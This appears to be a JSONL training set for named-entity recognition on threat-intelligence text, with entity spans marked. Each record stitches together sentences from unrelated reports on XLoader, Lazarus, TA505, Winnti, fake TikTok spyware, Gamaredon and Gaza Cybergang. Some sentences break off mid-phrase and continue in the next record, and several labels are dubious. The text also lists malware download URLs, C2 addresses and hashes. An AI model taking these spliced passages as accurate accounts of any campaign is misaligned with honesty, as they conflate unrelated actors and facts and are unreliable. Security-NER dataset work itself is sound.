All these information are automatically loaded by the RMS executable and firstly stored in the registry key \u201c HKCU\\Software\\tektonik\\Remote MANIPULATOR System\\Host\\parameters \u201d .", "spans": [{"start": 119, "end": 126, "label": "Organization"}, {"start": 295, "end": 298, "label": "System"}]} {"text": "By monitoring the package installation broadcast event , XLoader can start their packages . The actors behind this campaign we call LUCKY ELEPHANT use doppelganger webpages to mimic legitimate entities such as foreign governments , telecommunications , and military . At the next startup , the software will directly load the configuration from the just created key .", "spans": [{"start": 57, "end": 64, "label": "Malware"}, {"start": 132, "end": 146, "label": "Organization"}, {"start": 151, "end": 172, "label": "System"}, {"start": 210, "end": 229, "label": "Organization"}, {"start": 232, "end": 250, "label": "Organization"}, {"start": 257, "end": 265, "label": "Organization"}]} {"text": "This enables it to launch malicious apps without the user \u2019 s awareness and explicit consent . Currently , Sofacy targets large air-defense related commercial organizations in China with SPLM , and moves Zebrocy focus across Armenia , Turkey , Kazahkstan , Tajikistan , Afghanistan , Mongolia , China , and Japan . The client establishes a new connection with the remote command and control server hosted on a Bulgarian remote host 217.12.201.159 , part of a Virtual Dedicated Server subnet of the AS-21100, operated by ITL LLC .", "spans": [{"start": 432, "end": 446, "label": "Indicator"}, {"start": 459, "end": 483, "label": "System"}, {"start": 520, "end": 523, "label": "System"}, {"start": 524, "end": 527, "label": "System"}]} {"text": "We reverse engineered XLoader and found that it appears to target South Korea-based banks and game development companies . 
Either way , Sofacy's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . After the reconstruction of the full infection chain , we noticed strong similarities with a recent spear-phishing attack campaign against an unspecified US retail company .", "spans": [{"start": 22, "end": 29, "label": "Malware"}, {"start": 136, "end": 144, "label": "Organization"}]} {"text": "XLoader also prevents victims from accessing the device \u2019 s settings or using a known antivirus ( AV ) app in the country . According to this new alert , Hidden Cobra the U.S government\u2019s code name for Lazarus has been conducting FASTCash attacks stealing money from Automated Teller Machines (ATMs) from banks in Asia and Africa since at least 2016 . The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor : a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 154, "end": 166, "label": "Organization"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 378, "end": 386, "label": "Organization"}, {"start": 462, "end": 467, "label": "Organization"}]} {"text": "XLoader can also load multiple malicious modules to receive and execute commands from its remote command-and-control ( C & C ) server , as shown below : Here \u2019 s a list of the modules and their functions : sendSms \u2014 send SMS/MMS to a specified address setWifi \u2014 enable or disable Wi-Fi connection gcont \u2014 collect all the device \u2019 s contacts lock \u2014 currently just an input lock status in the settings ( pref ) file , but may be used as a screenlocking ransomware bc \u2014 collect all contacts Lazarus is a very active attack group involved in both cyber crime and espionage . 
The comparison of the infection chains reveals in both cases the attacker used a couple of SFX stages to deploy the \u201c RMS \u201d software : a legitimate remote administration tool produced by the Russian company \u201c TektonIT \u201d .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 488, "end": 495, "label": "Organization"}, {"start": 662, "end": 665, "label": "System"}, {"start": 689, "end": 692, "label": "System"}, {"start": 780, "end": 788, "label": "System"}]} {"text": "from the Android device and SIM card setForward \u2014 currently not implemented , but can be used to hijack the infected device getForward \u2014 currently not implemented , but can be used to hijack the infected device hasPkg \u2014 check the device whether a specified app is installed or not setRingerMode \u2014 set the device \u2019 s ringer mode setRecEnable \u2014 set the device \u2019 s ringer mode as silent reqState \u2014 get a detailed phone connection status , which includes activated network and Wi-Fi ( with or without password ) showHome \u2014 The group was initially known for its espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures . 
The tool is able to grant remote access and full , direct control of the infected machine to the group .", "spans": [{"start": 9, "end": 16, "label": "System"}, {"start": 523, "end": 528, "label": "Organization"}]} {"text": "force the device \u2019 s back to the home screen getnpki : get files/content from the folder named NPKI ( contains certificates related to financial transactions ) http \u2014 access a specified network using HttpURLConnection onRecordAction \u2014 simulate a number-dialed tone call \u2014 call a specified number get_apps \u2014 get all the apps installed on the device show_fs_float_window \u2014 show a full-screen window for phishing Of note is XLoader \u2019 s abuse of the WebSocket protocol ( supported in many browsers Following US-CERTs report , Symantec's research uncovered the key component used in Lazarus's recent wave of financial attacks . Also , some code pieces are directly re-used in the", "spans": [{"start": 421, "end": 428, "label": "Malware"}, {"start": 578, "end": 587, "label": "Organization"}, {"start": 603, "end": 612, "label": "Organization"}]} {"text": "and web applications ) via ws ( WebSockets ) or wss ( WebSockets over SSL/TLS ) to communicate with its C & C servers . More recently , Lazarus has also become involved in financially motivated attacks , including an US$81 million dollar theft from the Bangladesh Central Bank and the WannaCry ransomware . 
analyzed campaigns , such as the \u201c i.cmd \u201d and \u201c exit.exe \u201d files , and , at the same time , some new components have been introduced , for instance the \u201c rtegre.exe \u201d and the \u201c veter1605_MAPS_10cr0.exe \u201d file .", "spans": [{"start": 136, "end": 143, "label": "Organization"}, {"start": 253, "end": 276, "label": "Organization"}, {"start": 285, "end": 293, "label": "System"}, {"start": 342, "end": 347, "label": "Indicator"}, {"start": 356, "end": 364, "label": "Indicator"}, {"start": 462, "end": 472, "label": "Indicator"}, {"start": 485, "end": 509, "label": "Indicator"}]} {"text": "The URLs \u2014 abused as part of XLoader \u2019 s C & C \u2014 are hidden in three webpages , and the C & C server that XLoader connects to differ per region . Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well . During the analysis , we also noticed the \u201c veter1605_MAPS_10cr0.exe \u201d file slightly changed run after run , a few hours after the initial discovery the infection chain dropped it with different icons , different suffix , from \u201c cr0 \u201d to \u201c cr24 \u201d , and appendix from \u201c veter1605_ \u201d to \u201c veter2005_ \u201d .", "spans": [{"start": 29, "end": 36, "label": "Malware"}, {"start": 106, "end": 113, "label": "Malware"}, {"start": 207, "end": 214, "label": "Malware"}, {"start": 219, "end": 227, "label": "Malware"}, {"start": 350, "end": 374, "label": "Indicator"}]} {"text": "The abuse of the WebSocket protocol provides XLoader with a persistent connection between clients and servers where data can be transported any time . To make the fraudulent withdrawals , Lazarus first breaches targeted banks' networks and compromises the switch application servers handling ATM transactions . 
This may indicate the campaign is still ongoing .", "spans": [{"start": 45, "end": 52, "label": "Malware"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 220, "end": 226, "label": "Organization"}]} {"text": "XLoader abuses the MessagePack ( a data interchange format ) to package the stolen data and exfiltrate it via the WebSocket protocol for faster and more efficient transmission . The operation , known as FASTCash\u201d has enabled Lazarus to fraudulently empty ATMs of cash . The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the \u201c Stealthy Email Stealer \u201d part of their arsenal .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 225, "end": 232, "label": "Organization"}, {"start": 274, "end": 279, "label": "Organization"}]} {"text": "Mitigations XLoader will not download malicious apps if the Android device uses a mobile data connection . In order to permit their fraudulent withdrawals from ATMs , Lazarus inject a malicious Advanced Interactive eXecutive (AIX) executable into a running , legitimate process on the switch application server of a financial transaction network , in this case a network handling ATM transactions . The peculiarity of this recent attack wave is it actually hit a company not strictly in the Banking or Retail sector , as they recently did , suggesting the threat group could be potentially widening their current operations .", "spans": [{"start": 12, "end": 19, "label": "Malware"}, {"start": 167, "end": 174, "label": "Organization"}, {"start": 225, "end": 230, "label": "System"}]} {"text": "Nevertheless , users should practice proper security hygiene to mitigate threats that may take advantage of a home or business router \u2019 s security gaps . 
It was previously believed that the attackers used scripts to manipulate legitimate software on the server into enabling the fraudulent activity . Dropurl : kentona[.su \u2013 47.245.58.124 https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/ananas.exe https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/pasmmm.exe C2: 217[.12.201.159 TA505 : 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc27325 TA505 : 1ee1ba514212f11a69d002005dfc623b1871cc808f18ddfa2191102bbb9f623b TA505 : fd701894e7ec8d8319bc9b32bba5892b11bdf608c3d04c2f18eff83419eb6df0 TA505 : c69ce39ac3e178a89076136af7418c6cb664844b0ce5cb643912ed56c373a08a TA505 : 5310c2397ba4c783f7ee9724711a6da9b5c603b5c9781fff3407b46725e338b3 .", "spans": [{"start": 190, "end": 199, "label": "Organization"}, {"start": 205, "end": 212, "label": "System"}, {"start": 311, "end": 322, "label": "Indicator"}, {"start": 325, "end": 338, "label": "Indicator"}, {"start": 339, "end": 402, "label": "Indicator"}, {"start": 403, "end": 466, "label": "Indicator"}, {"start": 471, "end": 486, "label": "Indicator"}, {"start": 487, "end": 492, "label": "Organization"}, {"start": 495, "end": 561, "label": "Indicator"}, {"start": 562, "end": 567, "label": "Organization"}, {"start": 570, "end": 634, "label": "Indicator"}, {"start": 635, "end": 640, "label": "Organization"}, {"start": 643, "end": 707, "label": "Indicator"}, {"start": 708, "end": 713, "label": "Organization"}, {"start": 716, "end": 780, "label": "Indicator"}, {"start": 781, "end": 786, "label": "Organization"}, {"start": 789, "end": 853, "label": "Indicator"}]} {"text": "Employ stronger credentials , for instance , to make them less susceptible to unauthorized access . In recent years , Lazarus has also become involved in financially motivated attacks . 
Winnti : More than just Windows and Gates .", "spans": [{"start": 118, "end": 125, "label": "Organization"}, {"start": 154, "end": 165, "label": "Organization"}, {"start": 186, "end": 192, "label": "Malware"}, {"start": 210, "end": 217, "label": "System"}]} {"text": "Regularly update and patch the router \u2019 s software and firmware to prevent exploits , and enable its built-in firewall . This malware in turn intercepts fraudulent Lazarus cash withdrawal requests and sends fake approval responses , allowing the attackers to steal cash from ATMs . The Winnti malware family was first reported in 2013 by Kaspersky Lab .", "spans": [{"start": 126, "end": 133, "label": "System"}, {"start": 164, "end": 171, "label": "Organization"}, {"start": 286, "end": 292, "label": "Malware"}, {"start": 338, "end": 351, "label": "Organization"}]} {"text": "For system administrators and information security professionals , configuring the router to be more resistant to attacks like DNS cache poisoning can help mitigate similar threats . Lazarus was linked to the $81 million theft from the Bangladesh central bank in 2016 , along with a number of other bank heists . Since then , threat actors leveraging Winnti malware have victimized a diverse set of targets forvaried motivations .", "spans": [{"start": 183, "end": 190, "label": "Organization"}, {"start": 236, "end": 259, "label": "Organization"}, {"start": 351, "end": 357, "label": "Malware"}]} {"text": "Everyday users can do the same by checking the router \u2019 s DNS settings if they \u2019 ve been modified . Lazarus was also linked to the WannaCry ransomware outbreak in May 2017 . 
While the name \u2018 Winnti \u2019 in public reporting was previously used tosignify a single actor , pronounced divergence in targeting and tradecraft betweencampaigns has led industry consensus to break up the tracking of the continued use ofthe Winnti malware under different actor clusters .", "spans": [{"start": 100, "end": 107, "label": "Organization"}, {"start": 191, "end": 197, "label": "Malware"}, {"start": 413, "end": 419, "label": "Malware"}]} {"text": "Even threats like DNS cache poisoning employ social engineering , so users should also be more prudent against suspicious or unknown messages that have telltale signs of malware . WannaCry incorporated the leaked EternalBlue exploit that used two known vulnerabilities in Windows CVE-2017-0144 and CVE-2017-0145 to turn the ransomware into a worm , capable of spreading itself to any unpatched computers on the victim's network and also to other vulnerable computers connected to the internet . The underlying hypothesis is that themalware itself may be shared ( or sold ) across a small group of actors .", "spans": [{"start": 280, "end": 293, "label": "Vulnerability"}, {"start": 298, "end": 311, "label": "Vulnerability"}]} {"text": "We have worked with Google and they ensure that Google Play Protect proactively catches apps of this nature . Lazarus was initially known for its involvement in espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures that saw large amounts of information being stolen and computers wiped by malware . 
In April 2019 , reports emerged of an intrusion involving Winnti malware at a GermanPharmaceutical company .", "spans": [{"start": 20, "end": 26, "label": "Organization"}, {"start": 48, "end": 67, "label": "System"}, {"start": 110, "end": 117, "label": "Organization"}, {"start": 417, "end": 423, "label": "Malware"}, {"start": 437, "end": 457, "label": "Organization"}]} {"text": "No instances of these apps were found in Google Play . In short , Lazarus continues to pose a serious threat to the financial sector and organizations should take all necessary steps to ensure that their payment systems are fully up to date and secured . Following these reports , Chronicle researchers doubled downon efforts to try to unravel the various campaigns where Winnti was leveraged .", "spans": [{"start": 41, "end": 52, "label": "System"}, {"start": 66, "end": 73, "label": "Organization"}, {"start": 116, "end": 132, "label": "Organization"}, {"start": 281, "end": 290, "label": "Organization"}, {"start": 372, "end": 378, "label": "Malware"}]} {"text": "September 08 , 2020 TikTok Spyware A detailed analysis of spyware masquerading as TikTok A recent threat to ban TikTok in the United States has taken the internet by storm and received mixed reactions from social media and internet users . As with the 2016 series of virtual bank heists , including the Bangladesh Bank heist , FASTCash illustrates that Lazarus possesses an in-depth knowledge of banking systems and transaction processing protocols and has the expertise to leverage that knowledge in order to steal large sums from vulnerable banks . Analysisof these larger convoluted clusters is ongoing .", "spans": [{"start": 20, "end": 26, "label": "System"}, {"start": 82, "end": 88, "label": "System"}, {"start": 112, "end": 118, "label": "System"}, {"start": 327, "end": 335, "label": "Organization"}, {"start": 353, "end": 360, "label": "Organization"}]} {"text": "U.S. 
President Donald Trump has ordered ByteDance , the parent company of TikTok , to sell its U.S. TikTok assets and also issued executive orders that would ban the social media apps TikTok and WeChat from operating in the U.S. if the sale doesn \u2019 t happen in the next few weeks . The attack , which starts with a malicious attachment disguised as a top secret US document , weaponizes TeamViewer , the popular remote access and desktop sharing software , to gain full control of the infected computer . While reviewing a 2015 report of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti samples designed specifically for Linux .", "spans": [{"start": 40, "end": 49, "label": "Organization"}, {"start": 74, "end": 80, "label": "System"}, {"start": 100, "end": 106, "label": "System"}, {"start": 184, "end": 190, "label": "System"}, {"start": 195, "end": 201, "label": "System"}, {"start": 286, "end": 292, "label": "Organization"}, {"start": 387, "end": 397, "label": "System"}, {"start": 540, "end": 546, "label": "Malware"}, {"start": 562, "end": 572, "label": "Organization"}, {"start": 623, "end": 629, "label": "Malware"}, {"start": 664, "end": 669, "label": "System"}]} {"text": "On the other side , ByteDance has filed a lawsuit suing the Trump administration . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . The following is a technical analysis of thisvariant .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 149, "end": 167, "label": "Malware"}, {"start": 174, "end": 193, "label": "Malware"}]} {"text": "When popular applications come under fire and are featured prominently in the news , hackers get excited as these newsworthy apps can become their latest target . 
It is hard to tell if there are geopolitical motives behind this campaign by looking solely at the list of countries it was targeting , since it was not after a specific region and the victims came from different places in the world . The Linux version of Winnti is comprised of two files : a main backdoor ( libxselinux ) and a library ( libxselinux.so ) used to hide it \u2019s activity on an infected system . \u2018 libxselinux.so \u2019 \u2014 the userland rootkit . libxselinux.so.old : 11a9f798227be8a53b06d7e8943f8d68 906dc86cb466c1a22cf847dda27a434d04adf065 4741c2884d1ca3a40dadd3f3f61cb95a59b11f99a0f980dbadc663b85eb77a2a .", "spans": [{"start": 402, "end": 407, "label": "System"}, {"start": 419, "end": 425, "label": "Malware"}, {"start": 472, "end": 483, "label": "Malware"}, {"start": 502, "end": 516, "label": "Indicator"}, {"start": 573, "end": 587, "label": "Indicator"}, {"start": 615, "end": 633, "label": "Indicator"}, {"start": 636, "end": 668, "label": "Indicator"}, {"start": 669, "end": 709, "label": "Indicator"}, {"start": 710, "end": 774, "label": "Indicator"}]} {"text": "And TikTok is no exception . The initial infection vector used by the threat actor also changed over time , during 2018 we have seen multiple uses of self-extracting archives instead of malicious documents with AutoHotKey , which displayed a decoy image to the user . Ids.me .", "spans": [{"start": 4, "end": 10, "label": "System"}, {"start": 166, "end": 174, "label": "System"}, {"start": 211, "end": 221, "label": "Organization"}, {"start": 242, "end": 253, "label": "System"}, {"start": 268, "end": 274, "label": "Indicator"}]} {"text": "Generally , after an application gets banned from an official app store , such as Google Play , users try to find alternative ways to download the app . The recent wave of FASTCash attacks demonstrates that financially motivated attacks are not simply a passing interest for the Lazarus group and can now be considered one of its core activities . 
The library used to hide Winnti \u2019s system activity is a copy of the open-source userland rootkit Azazel , with minor changes .", "spans": [{"start": 82, "end": 93, "label": "System"}, {"start": 279, "end": 292, "label": "Organization"}, {"start": 373, "end": 379, "label": "Malware"}, {"start": 445, "end": 451, "label": "System"}]} {"text": "In doing so , users can become victims to malicious apps portraying themselves as the original app . Although both examples of the different delivery methods described above show an exclusive targeting of Russian speakers , the recurring financial and political themes that they use highlight the attacker's interest in the financial world once more . When executed , it will register symbols for multiple commonly used functions , including : open() , rmdir() , and unlink() , and modify their returns to hide the malware \u2019s operations .", "spans": [{"start": 297, "end": 307, "label": "Organization"}, {"start": 324, "end": 333, "label": "Organization"}, {"start": 444, "end": 450, "label": "System"}, {"start": 453, "end": 460, "label": "System"}, {"start": 467, "end": 475, "label": "System"}]} {"text": "Recently there was a huge wave of SMS messages , as well as Whatsapp messages , making the rounds asking users to download the latest version of TikTok at hxxp : //tiny [ . Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group . 
Distinct changes to Azazel by the Winnti developers include the addition of a function named \u2018 Decrypt2 \u2019 , which is used to decode an embedded configuration similar to the core implant .", "spans": [{"start": 60, "end": 68, "label": "System"}, {"start": 145, "end": 151, "label": "System"}, {"start": 155, "end": 172, "label": "Indicator"}, {"start": 276, "end": 283, "label": "Malware"}, {"start": 288, "end": 297, "label": "Organization"}, {"start": 326, "end": 332, "label": "System"}, {"start": 340, "end": 346, "label": "Malware"}, {"start": 401, "end": 409, "label": "System"}]} {"text": "] cc/TiktokPro . Gamaredon Group is an alleged Russian threat group . Unlike standard Azazel which is configured to hide network activity based on port ranges , the Winnti modified version keeps a list of process identifiers and network connections associated with the malware \u2019s activity .", "spans": [{"start": 17, "end": 32, "label": "Organization"}, {"start": 86, "end": 92, "label": "System"}, {"start": 165, "end": 171, "label": "Malware"}]} {"text": "In reality , this downloaded app is a fake app that asks for credentials and Android permissions ( including camera and phone permissions ) , resulting in the user being bombarded with advertisements . Gamaredon Group has been active since at least 2013 , and has targeted individuals likely involved with the Ukrainian government . This modification likely serves to simplify the operator \u2019s sample configuration process by not having to denote specific ports to hide .", "spans": [{"start": 77, "end": 84, "label": "System"}, {"start": 202, "end": 217, "label": "Organization"}, {"start": 310, "end": 330, "label": "Organization"}]} {"text": "Recently , we have come across another variant of this app portraying itself as TikTok Pro , but this is a full-fledged spyware with premium features to spy on victim with ease . 
EvilGnome's functionalities include desktop screenshots , file stealing , allowing capturing audio recording from the user\u2019s microphone and the ability to download and execute further modules . Strings within this sample associated with the malware \u2019s operations are encoded using a single-byte XOR encoding .", "spans": [{"start": 80, "end": 90, "label": "System"}, {"start": 179, "end": 190, "label": "Organization"}, {"start": 215, "end": 234, "label": "System"}, {"start": 237, "end": 250, "label": "System"}, {"start": 262, "end": 287, "label": "System"}]} {"text": "( Please note this is a different app and not the same as the one being spread by hxxp : //tiny [ . Gamaredon Group primarily makes use of Russian hosting providers in order to distribute its malware . The following is an example Python function to decode these strings . libxselinux.old : 7f4764c6e6dabd262341fd23a9b105a3 dc96d0f02151e702ef764bbc234d1e73d2811416 ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23 .", "spans": [{"start": 82, "end": 99, "label": "Indicator"}, {"start": 100, "end": 115, "label": "Organization"}, {"start": 192, "end": 199, "label": "System"}, {"start": 230, "end": 236, "label": "System"}, {"start": 272, "end": 287, "label": "Indicator"}, {"start": 290, "end": 322, "label": "Indicator"}, {"start": 323, "end": 363, "label": "Indicator"}, {"start": 364, "end": 428, "label": "Indicator"}]} {"text": "] cc/TiktokPro . Gamaredon Group's implants are characterized by the employment of information stealing tools \u2014 among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task . 
Ids.me .", "spans": [{"start": 17, "end": 34, "label": "Organization"}, {"start": 83, "end": 109, "label": "System"}, {"start": 243, "end": 249, "label": "Indicator"}]} {"text": ") Technical Analysis App Name : TikTok Pro Hash : 9fed52ee7312e217bd10d6a156c8b988 Package Name : com.example.dat.a8andoserverx Upon installation , the spyware portrays itself as TikTok using the name TikTok Pro . Gamaredon Group infects victims using malicious attachments , delivered via spear phishing techniques . Winnti Linux variant \u2019s core functionality is within \u2018 libxselinux \u2019 .", "spans": [{"start": 32, "end": 42, "label": "System"}, {"start": 50, "end": 82, "label": "Indicator"}, {"start": 98, "end": 127, "label": "Indicator"}, {"start": 179, "end": 185, "label": "System"}, {"start": 201, "end": 211, "label": "System"}, {"start": 214, "end": 229, "label": "Organization"}, {"start": 252, "end": 273, "label": "System"}, {"start": 318, "end": 324, "label": "Malware"}, {"start": 325, "end": 330, "label": "System"}, {"start": 373, "end": 384, "label": "Malware"}]} {"text": "As soon as a user tries to open the app , it launches a fake notification and soon the notification as well as the app icon disappears . The techniques and modules employed by EvilGnome \u2014 that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools\u2014remind us of Gamaredon Group\u2019s Windows tools . Upon execution , an embedded configuration is decoded from the data section using a simple XOR cipher .", "spans": [{"start": 176, "end": 185, "label": "Organization"}, {"start": 207, "end": 210, "label": "System"}, {"start": 325, "end": 338, "label": "Malware"}]} {"text": "This fake notification tactic is used to redirect the user 's attention , meanwhile the app hides itself , making the user believe the app to be faulty . We can observe that the sample is very recent , created on Thursday , July 4 . 
The decoded configuration is similar in structure to the version Kaspersky classifies as Winnti 2.0, as well as samples in the 2015 Novetta report .", "spans": [{"start": 178, "end": 184, "label": "Malware"}, {"start": 322, "end": 328, "label": "Malware"}, {"start": 365, "end": 372, "label": "Organization"}]} {"text": "This functionality can be seen in Figure 1 . As can be observed in the illustration above , the makeself script is instructed to run ./setup.sh after unpacking . Embedded in this sample \u2019s configuration three command-and-control server addresses and two additional strings we believe to be campaign designators .", "spans": [{"start": 96, "end": 111, "label": "Malware"}, {"start": 133, "end": 143, "label": "Malware"}]} {"text": "App Icon Figure 1 : App icon and fake notification . The ShooterAudio module uses PulseAudio to capture audio from the user's microphone . Winnti ver.1 , these values were designated as \u2018 tag \u2019 and \u2018 group \u2019 .", "spans": [{"start": 57, "end": 76, "label": "Malware"}, {"start": 82, "end": 92, "label": "System"}, {"start": 139, "end": 145, "label": "Malware"}]} {"text": "Behind the scenes , there are number of process occurring simultaneously . makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory . For context , embedded Winnti campaign designators have ranged from target names , geographic areas , industry , and profanity .", "spans": [{"start": 75, "end": 86, "label": "Malware"}, {"start": 98, "end": 110, "label": "Malware"}, {"start": 210, "end": 216, "label": "Malware"}]} {"text": "First , an activity named MainActivity fires up , taking care of hiding the icon and showing the fake notification . During our 2018 monitoring of this group , we were able to identify different techniques utilized by very similar attackers in the MENA region , sometimes on the same target . 
Winnti malware handles outbound communications using multiple protocols including : ICMP , HTTP , as well as custom TCP and UDP protocols .", "spans": [{"start": 152, "end": 157, "label": "Organization"}, {"start": 293, "end": 299, "label": "Malware"}, {"start": 377, "end": 381, "label": "Indicator"}, {"start": 384, "end": 388, "label": "Indicator"}, {"start": 409, "end": 412, "label": "Indicator"}, {"start": 417, "end": 420, "label": "Indicator"}]} {"text": "It also starts an Android service named MainService . Gaza Cybergang Group3 (highest sophistication) whose activities previously went by the name Operation Parliament . Use of these protocols is thoroughly documented in the Novetta and Kaspersky reports .", "spans": [{"start": 18, "end": 25, "label": "System"}, {"start": 54, "end": 75, "label": "Organization"}, {"start": 224, "end": 231, "label": "Organization"}, {"start": 236, "end": 245, "label": "Organization"}]} {"text": "The spyware also appears to have an additional payload stored under the /res/raw/ directory . Gaza Cybergang has been seen employing phishing , with several chained stages to evade detection and extend command and control server lifetimes . While the outbound communication mechanisms are well documented , less attention has been paid to a feature of recent versions of Winnti we came across in the Linux variant ( as well as Windows ) that allows the operators to initiate a connection directly to an infected host , without requiring a connection to a control server .", "spans": [{"start": 94, "end": 108, "label": "Organization"}, {"start": 371, "end": 377, "label": "Malware"}, {"start": 400, "end": 405, "label": "System"}, {"start": 427, "end": 434, "label": "System"}]} {"text": "This is a common technique used by malware developers to bundle the main payload inside the Android package to avoid easy detection . 
The most popular targets of SneakyPastes are embassies , government entities , education , media outlets , journalists , activists , political parties or personnel , healthcare and banking . This secondary communication channel may be used by operators when access to the hard-coded control servers is disrupted .", "spans": [{"start": 92, "end": 99, "label": "System"}, {"start": 162, "end": 174, "label": "Organization"}, {"start": 179, "end": 188, "label": "Organization"}, {"start": 191, "end": 210, "label": "Organization"}, {"start": 213, "end": 222, "label": "Organization"}, {"start": 225, "end": 238, "label": "Organization"}, {"start": 255, "end": 264, "label": "Organization"}, {"start": 288, "end": 297, "label": "Organization"}, {"start": 300, "end": 310, "label": "Organization"}, {"start": 315, "end": 322, "label": "Organization"}]} {"text": "As seen in Figure 2 , the app tries to open the payload from the /res/raw/ directory and generate an additional Android Package Kit ( APK ) named .app.apk : Decoy Code Figure 2 : The decoy code for the fake TikTok . Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel . Additionally , the operators could leverage this feature when infecting internet-facing devices in a targeted organization to allow them to reenter a network if evicted from internal hosts .", "spans": [{"start": 112, "end": 131, "label": "System"}, {"start": 146, "end": 154, "label": "Indicator"}, {"start": 207, "end": 213, "label": "System"}, {"start": 312, "end": 333, "label": "Organization"}, {"start": 344, "end": 353, "label": "Organization"}, {"start": 358, "end": 377, "label": "Organization"}]} {"text": "Upon analysis , we discovered that this is a decoy functionality and no new payload is generated . 
Gaza Cybergang Group1 is an attack group with limited infrastructure and an open-source type of toolset , which conducts widespread attacks , but is nevertheless focused on Palestinian political problems . This passive implant approach to network persistence has been previously observed with threat actors like Project Sauron and the Lamberts .", "spans": [{"start": 99, "end": 120, "label": "Organization"}, {"start": 272, "end": 283, "label": "Organization"}, {"start": 411, "end": 425, "label": "System"}, {"start": 434, "end": 442, "label": "System"}]} {"text": "The conditions to build an additional payload are never met . In this campaign , Gaza Cybergang used disposable emails and domains as the phishing platform to target the victims . Initial technical information about this feature was shared by the Thyssenkrupp CERT in the form of an Nmap script that could be used to identify Winnti infections through network scanning .", "spans": [{"start": 81, "end": 95, "label": "Organization"}, {"start": 247, "end": 264, "label": "Organization"}, {"start": 283, "end": 287, "label": "System"}, {"start": 326, "end": 332, "label": "Malware"}]} {"text": "Going one step further , we rebuilt the malware to execute the apparent functionality of generating a payload , but discovered that the APK stored in the /res/raw/ directory is empty . The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . 
This script identifies infected hosts by first sending a custom hello packet , immediately followed by an encoded request for host information , and then parsing the response .", "spans": [{"start": 189, "end": 192, "label": "Malware"}, {"start": 282, "end": 290, "label": "Malware"}, {"start": 295, "end": 302, "label": "Malware"}, {"start": 305, "end": 313, "label": "Malware"}, {"start": 316, "end": 323, "label": "Malware"}, {"start": 326, "end": 332, "label": "Malware"}, {"start": 335, "end": 353, "label": "Malware"}]} {"text": "The placement of the decoy functionality is likely designed to confuse the malware researchers . We expect the damage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the complicated Palestinian situation . The initial request , referred to as the helo/hello request in the Nmap script , is comprised of four DWORDs .", "spans": [{"start": 162, "end": 169, "label": "Organization"}, {"start": 227, "end": 260, "label": "Organization"}, {"start": 330, "end": 334, "label": "System"}, {"start": 365, "end": 371, "label": "System"}]} {"text": "It is also possible that this functionality is under development , making this placeholder code incomplete . Cylance determined that the \u2018Ghost Dragon\u2019 group utilized specifically tailored variants of Gh0st RAT , which the group modified from the 3.6 version of the source code released in 2008 . The first three are generated by rand() and the fourth is computed based on the first and third .", "spans": [{"start": 109, "end": 116, "label": "Organization"}, {"start": 137, "end": 151, "label": "Organization"}, {"start": 201, "end": 210, "label": "System"}, {"start": 330, "end": 336, "label": "System"}]} {"text": "Coming back to the execution flow , once the spyware hides itself , it starts an Android service named MainService . 
The standard network protocol for Gh0st RAT 3.6 employs zlib compression , which utilizes \u2018Gh0st\u2019 as a static five-byte packet flag that must be included in the first five bytes of initial transmission from the victim . When received by a Winnti infected host , it will validate the received packet and listen for a second inbound request containing tasking .", "spans": [{"start": 81, "end": 88, "label": "System"}, {"start": 151, "end": 164, "label": "Organization"}, {"start": 173, "end": 189, "label": "System"}, {"start": 356, "end": 362, "label": "Malware"}]} {"text": "Android services are components that can be made to execute independently in the background without the victim 's knowledge . In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller . This second request ( Encoded Get System Information Request ) is encoded using the same method as the custom TCP protocol used for communication with command-and-control servers , which uses a four-byte XOR encoding .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 167, "end": 176, "label": "Malware"}, {"start": 187, "end": 199, "label": "Organization"}, {"start": 436, "end": 439, "label": "Indicator"}]} {"text": "MainService is the brain of this spyware and controls almost everything\u2014from stealing the victim 's data to deleting it . SPEAR has observed numerous different XOR keys utilized by Ghost Dragon . Before acting on the request , Winnti will validate the third DWORD contains the magic value 0xABC18CBA before executing tasking .", "spans": [{"start": 181, "end": 193, "label": "Organization"}, {"start": 227, "end": 233, "label": "Malware"}, {"start": 258, "end": 263, "label": "System"}]} {"text": "All of its capabilities are discussed later in this blog . Exploit and tools continued to be used after Buckeye's apparent disappearance in 2017 . 
